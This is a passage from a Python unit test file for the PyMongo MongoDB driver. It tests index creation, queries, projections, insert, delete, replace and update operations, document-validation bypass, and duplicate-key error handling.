self.assertEqual('loc_2d', db.test.create_index([("loc", GEO2D)]))
index_info = db.test.index_information()['loc_2d']
self.assertEqual([('loc', '2d')], index_info['key'])
@client_context.require_no_mongos
def test_index_haystack(self):
db = self.db
db.test.drop()
_id = db.test.insert_one({
"pos": {"long": 34.2, "lat": 33.3},
"type": "restaurant"
}).inserted_id
db.test.insert_one({
"pos": {"long": 34.2, "lat": 37.3}, "type": "restaurant"
})
db.test.insert_one({
"pos": {"long": 59.1, "lat": 87.2}, "type": "office"
})
db.test.create_index(
[("pos", GEOHAYSTACK), ("type", ASCENDING)],
bucketSize=1
)
results = db.command(SON([
("geoSearch", "test"),
("near", [33, 33]),
("maxDistance", 6),
("search", {"type": "restaurant"}),
("limit", 30),
]))['results']
self.assertEqual(2, len(results))
self.assertEqual({
"_id": _id,
"pos": {"long": 34.2, "lat": 33.3},
"type": "restaurant"
}, results[0])
@client_context.require_version_min(2, 3, 2)
@client_context.require_no_mongos
def test_index_text(self):
enable_text_search(self.client)
db = self.db
db.test.drop_indexes()
self.assertEqual("t_text", db.test.create_index([("t", TEXT)]))
index_info = db.test.index_information()["t_text"]
self.assertTrue("weights" in index_info)
if client_context.version.at_least(2, 5, 5):
db.test.insert_many([
{'t': 'spam eggs and spam'},
{'t': 'spam'},
{'t': 'egg sausage and bacon'}])
# MongoDB 2.6 text search. Create 'score' field in projection.
cursor = db.test.find(
{'$text': {'$search': 'spam'}},
{'score': {'$meta': 'textScore'}})
# Sort by 'score' field.
cursor.sort([('score', {'$meta': 'textScore'})])
results = list(cursor)
self.assertTrue(results[0]['score'] >= results[1]['score'])
db.test.drop_indexes()
@client_context.require_version_min(2, 3, 2)
def test_index_2dsphere(self):
db = self.db
db.test.drop_indexes()
self.assertEqual("geo_2dsphere",
db.test.create_index([("geo", GEOSPHERE)]))
for dummy, info in db.test.index_information().items():
field, idx_type = info['key'][0]
if field == 'geo' and idx_type == '2dsphere':
break
else:
self.fail("2dsphere index not found.")
poly = {"type": "Polygon",
"coordinates": [[[40, 5], [40, 6], [41, 6], [41, 5], [40, 5]]]}
query = {"geo": {"$within": {"$geometry": poly}}}
# This query will error without a 2dsphere index.
db.test.find(query)
db.test.drop_indexes()
@client_context.require_version_min(2, 3, 2)
def test_index_hashed(self):
db = self.db
db.test.drop_indexes()
self.assertEqual("a_hashed",
db.test.create_index([("a", HASHED)]))
for dummy, info in db.test.index_information().items():
field, idx_type = info['key'][0]
if field == 'a' and idx_type == 'hashed':
break
else:
self.fail("hashed index not found.")
db.test.drop_indexes()
def test_index_sparse(self):
db = self.db
db.test.drop_indexes()
db.test.create_index([('key', ASCENDING)], sparse=True)
self.assertTrue(db.test.index_information()['key_1']['sparse'])
def test_index_background(self):
db = self.db
db.test.drop_indexes()
db.test.create_index([('keya', ASCENDING)])
db.test.create_index([('keyb', ASCENDING)], background=False)
db.test.create_index([('keyc', ASCENDING)], background=True)
self.assertFalse('background' in db.test.index_information()['keya_1'])
self.assertFalse(db.test.index_information()['keyb_1']['background'])
self.assertTrue(db.test.index_information()['keyc_1']['background'])
def _drop_dups_setup(self, db):
db.drop_collection('test')
db.test.insert_one({'i': 1})
db.test.insert_one({'i': 2})
db.test.insert_one({'i': 2}) # duplicate
db.test.insert_one({'i': 3})
@client_context.require_version_max(2, 6)
def test_index_drop_dups(self):
# Try dropping duplicates
db = self.db
self._drop_dups_setup(db)
# No error, just drop the duplicate
db.test.create_index([('i', ASCENDING)], unique=True, dropDups=True)
# Duplicate was dropped
self.assertEqual(3, db.test.count())
# Index was created, plus the index on _id
self.assertEqual(2, len(db.test.index_information()))
def test_index_dont_drop_dups(self):
# Try *not* dropping duplicates
db = self.db
self._drop_dups_setup(db)
# There's a duplicate
def test_create():
db.test.create_index(
[('i', ASCENDING)],
unique=True,
dropDups=False
)
self.assertRaises(DuplicateKeyError, test_create)
# Duplicate wasn't dropped
self.assertEqual(4, db.test.count())
# Index wasn't created, only the default index on _id
self.assertEqual(1, len(db.test.index_information()))
# Get the plan dynamically because the explain format will change.
def get_plan_stage(self, root, stage):
if root.get('stage') == stage:
return root
elif "inputStage" in root:
return self.get_plan_stage(root['inputStage'], stage)
elif "inputStages" in root:
for i in root['inputStages']:
stage = self.get_plan_stage(i, stage)
if stage:
return stage
elif "shards" in root:
for i in root['shards']:
stage = self.get_plan_stage(i['winningPlan'], stage)
if stage:
return stage
return {}
@client_context.require_version_min(3, 1, 9, -1)
def test_index_filter(self):
db = self.db
db.drop_collection("test")
# Test bad filter spec on create.
self.assertRaises(OperationFailure, db.test.create_index, "x",
partialFilterExpression=5)
self.assertRaises(OperationFailure, db.test.create_index, "x",
partialFilterExpression={"x": {"$asdasd": 3}})
self.assertRaises(OperationFailure, db.test.create_index, "x",
partialFilterExpression={"$and": 5})
self.assertRaises(OperationFailure, db.test.create_index, "x",
partialFilterExpression={
"$and": [{"$and": [{"x": {"$lt": 2}},
{"x": {"$gt": 0}}]},
{"x": {"$exists": True}}]})
self.assertEqual("x_1", db.test.create_index(
[('x', ASCENDING)], partialFilterExpression={"a": {"$lte": 1.5}}))
db.test.insert_one({"x": 5, "a": 2})
db.test.insert_one({"x": 6, "a": 1})
# Operations that use the partial index.
explain = db.test.find({"x": 6, "a": 1}).explain()
stage = self.get_plan_stage(explain['queryPlanner']['winningPlan'],
'IXSCAN')
self.assertEqual("x_1", stage.get('indexName'))
self.assertTrue(stage.get('isPartial'))
explain = db.test.find({"x": {"$gt": 1}, "a": 1}).explain()
stage = self.get_plan_stage(explain['queryPlanner']['winningPlan'],
'IXSCAN')
self.assertEqual("x_1", stage.get('indexName'))
self.assertTrue(stage.get('isPartial'))
explain = db.test.find({"x": 6, "a": {"$lte": 1}}).explain()
stage = self.get_plan_stage(explain['queryPlanner']['winningPlan'],
'IXSCAN')
self.assertEqual("x_1", stage.get('indexName'))
self.assertTrue(stage.get('isPartial'))
# Operations that do not use the partial index.
explain = db.test.find({"x": 6, "a": {"$lte": 1.6}}).explain()
stage = self.get_plan_stage(explain['queryPlanner']['winningPlan'],
'COLLSCAN')
self.assertNotEqual({}, stage)
explain = db.test.find({"x": 6}).explain()
stage = self.get_plan_stage(explain['queryPlanner']['winningPlan'],
'COLLSCAN')
self.assertNotEqual({}, stage)
# Test drop_indexes.
db.test.drop_index("x_1")
explain = db.test.find({"x": 6, "a": 1}).explain()
stage = self.get_plan_stage(explain['queryPlanner']['winningPlan'],
'COLLSCAN')
self.assertNotEqual({}, stage)
def test_field_selection(self):
db = self.db
db.drop_collection("test")
doc = {"a": 1, "b": 5, "c": {"d": 5, "e": 10}}
db.test.insert_one(doc)
# Test field inclusion
doc = next(db.test.find({}, ["_id"]))
self.assertEqual(list(doc), ["_id"])
doc = next(db.test.find({}, ["a"]))
l = list(doc)
l.sort()
self.assertEqual(l, ["_id", "a"])
doc = next(db.test.find({}, ["b"]))
l = list(doc)
l.sort()
self.assertEqual(l, ["_id", "b"])
doc = next(db.test.find({}, ["c"]))
l = list(doc)
l.sort()
self.assertEqual(l, ["_id", "c"])
doc = next(db.test.find({}, ["a"]))
self.assertEqual(doc["a"], 1)
doc = next(db.test.find({}, ["b"]))
self.assertEqual(doc["b"], 5)
doc = next(db.test.find({}, ["c"]))
self.assertEqual(doc["c"], {"d": 5, "e": 10})
# Test inclusion of fields with dots
doc = next(db.test.find({}, ["c.d"]))
self.assertEqual(doc["c"], {"d": 5})
doc = next(db.test.find({}, ["c.e"]))
self.assertEqual(doc["c"], {"e": 10})
doc = next(db.test.find({}, ["b", "c.e"]))
self.assertEqual(doc["c"], {"e": 10})
doc = next(db.test.find({}, ["b", "c.e"]))
l = list(doc)
l.sort()
self.assertEqual(l, ["_id", "b", "c"])
doc = next(db.test.find({}, ["b", "c.e"]))
self.assertEqual(doc["b"], 5)
# Test field exclusion
doc = next(db.test.find({}, {"a": False, "b": 0}))
l = list(doc)
l.sort()
self.assertEqual(l, ["_id", "c"])
doc = next(db.test.find({}, {"_id": False}))
l = list(doc)
self.assertFalse("_id" in l)
def test_options(self):
db = self.db
db.drop_collection("test")
db.create_collection("test", capped=True, size=4096)
result = db.test.options()
# mongos 2.2.x adds an $auth field when auth is enabled.
result.pop('$auth', None)
self.assertEqual(result, {"capped": True, 'size': 4096})
db.drop_collection("test")
def test_insert_one(self):
db = self.db
db.test.drop()
document = {"_id": 1000}
result = db.test.insert_one(document)
self.assertTrue(isinstance(result, InsertOneResult))
self.assertTrue(isinstance(result.inserted_id, int))
self.assertEqual(document["_id"], result.inserted_id)
self.assertTrue(result.acknowledged)
self.assertIsNotNone(db.test.find_one({"_id": document["_id"]}))
self.assertEqual(1, db.test.count())
document = {"foo": "bar"}
result = db.test.insert_one(document)
self.assertTrue(isinstance(result, InsertOneResult))
self.assertTrue(isinstance(result.inserted_id, ObjectId))
self.assertEqual(document["_id"], result.inserted_id)
self.assertTrue(result.acknowledged)
self.assertIsNotNone(db.test.find_one({"_id": document["_id"]}))
self.assertEqual(2, db.test.count())
db = db.client.get_database(db.name,
write_concern=WriteConcern(w=0))
result = db.test.insert_one(document)
self.assertTrue(isinstance(result, InsertOneResult))
self.assertTrue(isinstance(result.inserted_id, ObjectId))
self.assertEqual(document["_id"], result.inserted_id)
self.assertFalse(result.acknowledged)
# The insert failed duplicate key...
wait_until(lambda: 2 == db.test.count(), 'forcing duplicate key error')
document = RawBSONDocument(
bson.BSON.encode({'_id': ObjectId(), 'foo': 'bar'}))
result = db.test.insert_one(document)
self.assertTrue(isinstance(result, InsertOneResult))
self.assertEqual(result.inserted_id, None)
def test_insert_many(self):
db = self.db
db.test.drop()
docs = [{} for _ in range(5)]
result = db.test.insert_many(docs)
self.assertTrue(isinstance(result, InsertManyResult))
self.assertTrue(isinstance(result.inserted_ids, list))
self.assertEqual(5, len(result.inserted_ids))
for doc in docs:
_id = doc["_id"]
self.assertTrue(isinstance(_id, ObjectId))
self.assertTrue(_id in result.inserted_ids)
self.assertEqual(1, db.test.count({'_id': _id}))
self.assertTrue(result.acknowledged)
docs = [{"_id": i} for i in range(5)]
result = db.test.insert_many(docs)
self.assertTrue(isinstance(result, InsertManyResult))
self.assertTrue(isinstance(result.inserted_ids, list))
self.assertEqual(5, len(result.inserted_ids))
for doc in docs:
_id = doc["_id"]
self.assertTrue(isinstance(_id, int))
self.assertTrue(_id in result.inserted_ids)
self.assertEqual(1, db.test.count({"_id": _id}))
self.assertTrue(result.acknowledged)
docs = [RawBSONDocument(bson.BSON.encode({"_id": i + 5}))
for i in range(5)]
result = db.test.insert_many(docs)
self.assertTrue(isinstance(result, InsertManyResult))
self.assertTrue(isinstance(result.inserted_ids, list))
self.assertEqual([], result.inserted_ids)
db = db.client.get_database(db.name,
write_concern=WriteConcern(w=0))
docs = [{} for _ in range(5)]
result = db.test.insert_many(docs)
self.assertTrue(isinstance(result, InsertManyResult))
self.assertFalse(result.acknowledged)
self.assertEqual(20, db.test.count())
def test_delete_one(self):
self.db.test.drop()
self.db.test.insert_one({"x": 1})
self.db.test.insert_one({"y": 1})
self.db.test.insert_one({"z": 1})
result = self.db.test.delete_one({"x": 1})
self.assertTrue(isinstance(result, DeleteResult))
self.assertEqual(1, result.deleted_count)
self.assertTrue(result.acknowledged)
self.assertEqual(2, self.db.test.count())
result = self.db.test.delete_one({"y": 1})
self.assertTrue(isinstance(result, DeleteResult))
self.assertEqual(1, result.deleted_count)
self.assertTrue(result.acknowledged)
self.assertEqual(1, self.db.test.count())
db = self.db.client.get_database(self.db.name,
write_concern=WriteConcern(w=0))
result = db.test.delete_one({"z": 1})
self.assertTrue(isinstance(result, DeleteResult))
self.assertRaises(InvalidOperation, lambda: result.deleted_count)
self.assertFalse(result.acknowledged)
wait_until(lambda: 0 == db.test.count(), 'delete 1 documents')
def test_delete_many(self):
self.db.test.drop()
self.db.test.insert_one({"x": 1})
self.db.test.insert_one({"x": 1})
self.db.test.insert_one({"y": 1})
self.db.test.insert_one({"y": 1})
result = self.db.test.delete_many({"x": 1})
self.assertTrue(isinstance(result, DeleteResult))
self.assertEqual(2, result.deleted_count)
self.assertTrue(result.acknowledged)
self.assertEqual(0, self.db.test.count({"x": 1}))
db = self.db.client.get_database(self.db.name,
write_concern=WriteConcern(w=0))
result = db.test.delete_many({"y": 1})
self.assertTrue(isinstance(result, DeleteResult))
self.assertRaises(InvalidOperation, lambda: result.deleted_count)
self.assertFalse(result.acknowledged)
wait_until(lambda: 0 == db.test.count(), 'delete 2 documents')
def test_command_document_too_large(self):
large = '*' * (self.client.max_bson_size + _COMMAND_OVERHEAD)
coll = self.db.test
self.assertRaises(
DocumentTooLarge, coll.insert_one, {'data': large})
# update_one and update_many are the same
self.assertRaises(
DocumentTooLarge, coll.replace_one, {}, {'data': large})
self.assertRaises(
DocumentTooLarge, coll.delete_one, {'data': large})
@client_context.require_version_min(3, 1, 9, -1)
def test_insert_bypass_document_validation(self):
db = self.db
db.test.drop()
db.create_collection("test", validator={"a": {"$exists": True}})
db_w0 = self.db.client.get_database(
self.db.name, write_concern=WriteConcern(w=0))
# Test insert_one
self.assertRaises(OperationFailure, db.test.insert_one,
{"_id": 1, "x": 100})
result = db.test.insert_one({"_id": 1, "x": 100},
bypass_document_validation=True)
self.assertTrue(isinstance(result, InsertOneResult))
self.assertEqual(1, result.inserted_id)
result = db.test.insert_one({"_id":2, "a":0})
self.assertTrue(isinstance(result, InsertOneResult))
self.assertEqual(2, result.inserted_id)
self.assertRaises(OperationFailure, db_w0.test.insert_one,
{"x": 1}, bypass_document_validation=True)
# Test insert_many
docs = [{"_id": i, "x": 100 - i} for i in range(3, 100)]
self.assertRaises(OperationFailure, db.test.insert_many, docs)
result = db.test.insert_many(docs, bypass_document_validation=True)
self.assertTrue(isinstance(result, InsertManyResult))
self.assertTrue(97, len(result.inserted_ids))
for doc in docs:
_id = doc["_id"]
self.assertTrue(isinstance(_id, int))
self.assertTrue(_id in result.inserted_ids)
self.assertEqual(1, db.test.count({"x": doc["x"]}))
self.assertTrue(result.acknowledged)
docs = [{"_id": i, "a": 200 - i} for i in range(100, 200)]
result = db.test.insert_many(docs)
self.assertTrue(isinstance(result, InsertManyResult))
self.assertTrue(97, len(result.inserted_ids))
for doc in docs:
_id = doc["_id"]
self.assertTrue(isinstance(_id, int))
self.assertTrue(_id in result.inserted_ids)
self.assertEqual(1, db.test.count({"a": doc["a"]}))
self.assertTrue(result.acknowledged)
self.assertRaises(OperationFailure, db_w0.test.insert_many,
[{"x": 1}, {"x": 2}],
bypass_document_validation=True)
@client_context.require_version_min(3, 1, 9, -1)
def test_replace_bypass_document_validation(self):
db = self.db
db.test.drop()
db.create_collection("test", validator={"a": {"$exists": True}})
db_w0 = self.db.client.get_database(
self.db.name, write_concern=WriteConcern(w=0))
# Test replace_one
db.test.insert_one({"a": 101})
self.assertRaises(OperationFailure, db.test.replace_one,
{"a": 101}, {"y": 1})
self.assertEqual(0, db.test.count({"y": 1}))
self.assertEqual(1, db.test.count({"a": 101}))
db.test.replace_one({"a": 101}, {"y": 1},
bypass_document_validation=True)
self.assertEqual(0, db.test.count({"a": 101}))
self.assertEqual(1, db.test.count({"y": 1}))
db.test.replace_one({"y": 1}, {"a": 102})
self.assertEqual(0, db.test.count({"y": 1}))
self.assertEqual(0, db.test.count({"a": 101}))
self.assertEqual(1, db.test.count({"a": 102}))
db.test.insert_one({"y": 1}, bypass_document_validation=True)
self.assertRaises(OperationFailure, db.test.replace_one,
{"y": 1}, {"x": 101})
self.assertEqual(0, db.test.count({"x": 101}))
self.assertEqual(1, db.test.count({"y": 1}))
db.test.replace_one({"y": 1}, {"x": 101},
bypass_document_validation=True)
self.assertEqual(0, db.test.count({"y": 1}))
self.assertEqual(1, db.test.count({"x": 101}))
db.test.replace_one({"x": 101}, {"a": 103},
bypass_document_validation=False)
self.assertEqual(0, db.test.count({"x": 101}))
self.assertEqual(1, db.test.count({"a": 103}))
self.assertRaises(OperationFailure, db_w0.test.replace_one, {"y": 1},
{"x": 1}, bypass_document_validation=True)
@client_context.require_version_min(3, 1, 9, -1)
def test_update_bypass_document_validation(self):
db = self.db
db.test.drop()
db.test.insert_one({"z": 5})
db.command(SON([("collMod", "test"),
("validator", {"z": {"$gte": 0}})]))
db_w0 = self.db.client.get_database(
self.db.name, write_concern=WriteConcern(w=0))
# Test update_one
self.assertRaises(OperationFailure, db.test.update_one,
{"z": 5}, {"$inc": {"z": -10}})
self.assertEqual(0, db.test.count({"z": -5}))
self.assertEqual(1, db.test.count({"z": 5}))
db.test.update_one({"z": 5}, {"$inc": {"z": -10}},
bypass_document_validation=True)
self.assertEqual(0, db.test.count({"z": 5}))
self.assertEqual(1, db.test.count({"z": -5}))
db.test.update_one({"z": -5}, {"$inc": {"z": 6}},
bypass_document_validation=False)
self.assertEqual(1, db.test.count({"z": 1}))
self.assertEqual(0, db.test.count({"z": -5}))
db.test.insert_one({"z": -10},
bypass_document_validation=True)
self.assertRaises(OperationFailure, db.test.update_one,
{"z": -10}, {"$inc": {"z": 1}})
self.assertEqual(0, db.test.count({"z": -9}))
self.assertEqual(1, db.test.count({"z": -10}))
db.test.update_one({"z": -10}, {"$inc": {"z": 1}},
bypass_document_validation=True)
self.assertEqual(1, db.test.count({"z": -9}))
self.assertEqual(0, db.test.count({"z": -10}))
db.test.update_one({"z": -9}, {"$inc": {"z": 9}},
bypass_document_validation=False)
self.assertEqual(0, db.test.count({"z": -9}))
self.assertEqual(1, db.test.count({"z": 0}))
self.assertRaises(OperationFailure, db_w0.test.update_one, {"y": 1},
{"$inc": {"x": 1}}, bypass_document_validation=True)
# Test update_many
db.test.insert_many([{"z": i} for i in range(3, 101)])
db.test.insert_one({"y": 0},
bypass_document_validation=True)
self.assertRaises(OperationFailure, db.test.update_many, {},
{"$inc": {"z": -100}})
self.assertEqual(100, db.test.count({"z": {"$gte": 0}}))
self.assertEqual(0, db.test.count({"z": {"$lt": 0}}))
self.assertEqual(0, db.test.count({"y": 0, "z": -100}))
db.test.update_many({"z": {"$gte": 0}}, {"$inc": {"z": -100}},
bypass_document_validation=True)
self.assertEqual(0, db.test.count({"z": {"$gt": 0}}))
self.assertEqual(100, db.test.count({"z": {"$lte": 0}}))
db.test.update_many({"z": {"$gt": -50}}, {"$inc": {"z": 100}},
bypass_document_validation=False)
self.assertEqual(50, db.test.count({"z": {"$gt": 0}}))
self.assertEqual(50, db.test.count({"z": {"$lt": 0}}))
db.test.insert_many([{"z": -i} for i in range(50)],
bypass_document_validation=True)
self.assertRaises(OperationFailure, db.test.update_many,
{}, {"$inc": {"z": 1}})
self.assertEqual(100, db.test.count({"z": {"$lte": 0}}))
self.assertEqual(50, db.test.count({"z": {"$gt": 1}}))
db.test.update_many({"z": {"$gte": 0}}, {"$inc": {"z": -100}},
bypass_document_validation=True)
self.assertEqual(0, db.test.count({"z": {"$gt": 0}}))
self.assertEqual(150, db.test.count({"z": {"$lte": 0}}))
db.test.update_many({"z": {"$lte": 0}}, {"$inc": {"z": 100}},
bypass_document_validation=False)
self.assertEqual(150, db.test.count({"z": {"$gte": 0}}))
self.assertEqual(0, db.test.count({"z": {"$lt": 0}}))
self.assertRaises(OperationFailure, db_w0.test.update_many, {"y": 1},
{"$inc": {"x": 1}}, bypass_document_validation=True)
@client_context.require_version_min(3, 1, 9, -1)
def test_bypass_document_validation_bulk_write(self):
db = self.db
db.test.drop()
db.create_collection("test", validator={"a": {"$gte": 0}})
db_w0 = self.db.client.get_database(
self.db.name, write_concern=WriteConcern(w=0))
ops = [InsertOne({"a": -10}),
InsertOne({"a": -11}),
InsertOne({"a": -12}),
UpdateOne({"a": {"$lte": -10}}, {"$inc": {"a": 1}}),
UpdateMany({"a": {"$lte": -10}}, {"$inc": {"a": 1}}),
ReplaceOne({"a": {"$lte": -10}}, {"a": -1})]
db.test.bulk_write(ops, bypass_document_validation=True)
self.assertEqual(3, db.test.count())
self.assertEqual(1, db.test.count({"a": -11}))
self.assertEqual(1, db.test.count({"a": -1}))
self.assertEqual(1, db.test.count({"a": -9}))
# Assert that the operations would fail without bypass_doc_val
for op in ops:
self.assertRaises(BulkWriteError, db.test.bulk_write, [op])
self.assertRaises(OperationFailure, db_w0.test.bulk_write, ops,
bypass_document_validation=True)
def test_find_by_default_dct(self):
db = self.db
db.test.insert_one({'foo': 'bar'})
dct = defaultdict(dict, [('foo', 'bar')])
self.assertIsNotNone(db.test.find_one(dct))
self.assertEqual(dct, defaultdict(dict, [('foo', 'bar')]))
def test_find_w_fields(self):
db = self.db
db.test.delete_many({})
db.test.insert_one({"x": 1, "mike": "awesome",
"extra thing": "abcdefghijklmnopqrstuvwxyz"})
self.assertEqual(1, db.test.count())
doc = next(db.test.find({}))
self.assertTrue("x" in doc)
doc = next(db.test.find({}))
self.assertTrue("mike" in doc)
doc = next(db.test.find({}))
self.assertTrue("extra thing" in doc)
doc = next(db.test.find({}, ["x", "mike"]))
self.assertTrue("x" in doc)
doc = next(db.test.find({}, ["x", "mike"]))
self.assertTrue("mike" in doc)
doc = next(db.test.find({}, ["x", "mike"]))
self.assertFalse("extra thing" in doc)
doc = next(db.test.find({}, ["mike"]))
self.assertFalse("x" in doc)
doc = next(db.test.find({}, ["mike"]))
self.assertTrue("mike" in doc)
doc = next(db.test.find({}, ["mike"]))
self.assertFalse("extra thing" in doc)
def test_fields_specifier_as_dict(self):
db = self.db
db.test.delete_many({})
db.test.insert_one({"x": [1, 2, 3], "mike": "awesome"})
self.assertEqual([1, 2, 3], db.test.find_one()["x"])
self.assertEqual([2, 3],
db.test.find_one(
projection={"x": {"$slice": -2}})["x"])
self.assertTrue("x" not in db.test.find_one(projection={"x": 0}))
self.assertTrue("mike" in db.test.find_one(projection={"x": 0}))
def test_find_w_regex(self):
db = self.db
db.test.delete_many({})
db.test.insert_one({"x": "hello_world"})
db.test.insert_one({"x": "hello_mike"})
db.test.insert_one({"x": "hello_mikey"})
db.test.insert_one({"x": "hello_test"})
self.assertEqual(db.test.find().count(), 4)
self.assertEqual(db.test.find({"x":
re.compile("^hello.*")}).count(), 4)
self.assertEqual(db.test.find({"x":
re.compile("ello")}).count(), 4)
self.assertEqual(db.test.find({"x":
re.compile("^hello$")}).count(), 0)
self.assertEqual(db.test.find({"x":
re.compile("^hello_mi.*$")}).count(), 2)
def test_id_can_be_anything(self):
db = self.db
db.test.delete_many({})
auto_id = {"hello": "world"}
db.test.insert_one(auto_id)
self.assertTrue(isinstance(auto_id["_id"], ObjectId))
numeric = {"_id": 240, "hello": "world"}
db.test.insert_one(numeric)
self.assertEqual(numeric["_id"], 240)
obj = {"_id": numeric, "hello": "world"}
db.test.insert_one(obj)
self.assertEqual(obj["_id"], numeric)
for x in db.test.find():
self.assertEqual(x["hello"], u"world")
self.assertTrue("_id" in x)
def test_invalid_key_names(self):
db = self.db
db.test.drop()
db.test.insert_one({"hello": "world"})
db.test.insert_one({"hello": {"hello": "world"}})
self.assertRaises(InvalidDocument, db.test.insert_one,
{"$hello": "world"})
self.assertRaises(InvalidDocument, db.test.insert_one,
{"hello": {"$hello": "world"}})
db.test.insert_one({"he$llo": "world"})
db.test.insert_one({"hello": {"hello$": "world"}})
self.assertRaises(InvalidDocument, db.test.insert_one,
{".hello": "world"})
self.assertRaises(InvalidDocument, db.test.insert_one,
{"hello": {".hello": "world"}})
self.assertRaises(InvalidDocument, db.test.insert_one,
{"hello.": "world"})
self.assertRaises(InvalidDocument, db.test.insert_one,
{"hello": {"hello.": "world"}})
self.assertRaises(InvalidDocument, db.test.insert_one,
{"hel.lo": "world"})
self.assertRaises(InvalidDocument, db.test.insert_one,
{"hello": {"hel.lo": "world"}})
def test_unique_index(self):
db = self.db
db.drop_collection("test")
db.test.create_index("hello")
# No error.
db.test.insert_one({"hello": "world"})
db.test.insert_one({"hello": "world"})
db.drop_collection("test")
db.test.create_index("hello", unique=True)
with self.assertRaises(DuplicateKeyError):
db.test.insert_one({"hello": "world"})
db.test.insert_one({"hello": "world"})
def test_duplicate_key_error(self):
db = self.db
db.drop_collection("test")
db.test.create_index("x", unique=True)
db.test.insert_one({"_id": 1, "x": 1})
with self.assertRaises(DuplicateKeyError) as context:
db.test.insert_one({"x": 1})
self.assertIsNotNone(context.exception.details)
with self.assertRaises(DuplicateKeyError) as context:
db.test.insert_one({"x": 1})
self.assertIsNotNone(context.exception.details)
self.assertEqual(1, db.test.count())
def test_write_error_text_handling(self):
db = self.db
db.drop_collection("test")
db.test.create_index("text", unique=True)
# Test workaround for SERVER-24007
data = (b'a\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83'
b'\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83'
b'\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83'
b'\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83'
b'\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83'
b'\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83'
b'\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83'
b'\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83'
b'\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83'
b'\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83'
b'\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83'
b'\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83'
b'\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83'
b'\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83'
b'\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83'
b'\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83'
b'\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83'
b'\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83'
b'\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83'
b'\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83'
b'\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83'
b'\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83'
b'\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83'
b'\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83'
b'\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83'
b'\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83'
b'\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83'
b'\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83')
text = data.decode("utf8")
db.test.insert_one({"text": text})
# Should raise DuplicateKeyError, not InvalidBSON
self.assertRaises(DuplicateKeyError,
db.test.insert_one,
{"text": text})
self.assertRaises(DuplicateKeyError,
db.test.insert,
{"text": text})
self.assertRaises(DuplicateKeyError,
db.test.insert,
[{"text": text}])
self.assertRaises(DuplicateKeyError,
db.test.replace_one,
{"_id": ObjectId()},
{"text": text},
upsert=True)
self.assertRaises(DuplicateKeyError,
db.test.update,
{"_id": ObjectId()},
{"text": text},
upsert=True)
# Should raise BulkWriteError, not InvalidBSON
self.assertRaises(BulkWriteError,
db.test.insert_many,
[{"text": text}])
def test_wtimeout(self):
# Ensure setting wtimeout doesn't disable write concern altogether.
# See SERVER-12596.
collection = self.db.test
collection.drop()
collection.insert_one({'_id': 1})
coll = collection.with_options(
write_concern=WriteConcern(w=1, wtimeout=1000))
self.assertRaises(DuplicateKeyError, coll.insert_one, {'_id': 1})
coll = collection.with_options(
write_concern=WriteConcern(wtimeout=1000))
self.assertRaises(DuplicateKeyError, coll.insert_one, {'_id': 1})
def test_error_code(self):
try:
self.db.test.update_many({}, {"$thismodifierdoesntexist": 1})
except OperationFailure as exc:
self.assertTrue(exc.code in (9, 10147, 16840, 17009))
# Just check that we set the error document. Fields
# vary by MongoDB version.
self.assertTrue(exc.details is not None)
else:
self.fail("OperationFailure was not raised")
def test_index_on_subfield(self):
db = self.db
db.drop_collection("test")
db.test.insert_one({"hello": {"a": 4, "b": 5}})
db.test.insert_one({"hello": {"a": 7, "b": 2}})
db.test.insert_one({"hello": {"a": 4, "b": 10}})
db.drop_collection("test")
db.test.create_index("hello.a", unique=True)
db.test.insert_one({"hello": {"a": 4, "b": 5}})
db.test.insert_one({"hello": {"a": 7, "b": 2}})
self.assertRaises(DuplicateKeyError,
db.test.insert_one,
{"hello": {"a": 4, "b": 10}})
def test_replace_one(self):
db = self.db
db.drop_collection("test")
self.assertRaises(ValueError,
lambda: db.test.replace_one({}, {"$set": {"x": 1}}))
id1 = db.test.insert_one({"x": 1}).inserted_id
result = db.test.replace_one({"x": 1}, {"y": 1})
self.assertTrue(isinstance(result, UpdateResult))
self.assertEqual(1, result.matched_count)
self.assertTrue(result.modified_count in (None, 1))
self.assertIsNone(result.upserted_id)
self.assertTrue(result.acknowledged)
self.assertEqual(1, db.test.count({"y": 1}))
self.assertEqual(0, db.test.count({"x": 1}))
self.assertEqual(db.test.find_one(id1)["y"], 1)
replacement = RawBSONDocument(bson.BSON.encode({"_id": id1, "z": 1}))
result = db.test.replace_one({"y": 1}, replacement, True)
self.assertTrue(isinstance(result, UpdateResult))
self.assertEqual(1, result.matched_count)
self.assertTrue(result.modified_count in (None, 1))
self.assertIsNone(result.upserted_id)
self.assertTrue(result.acknowledged)
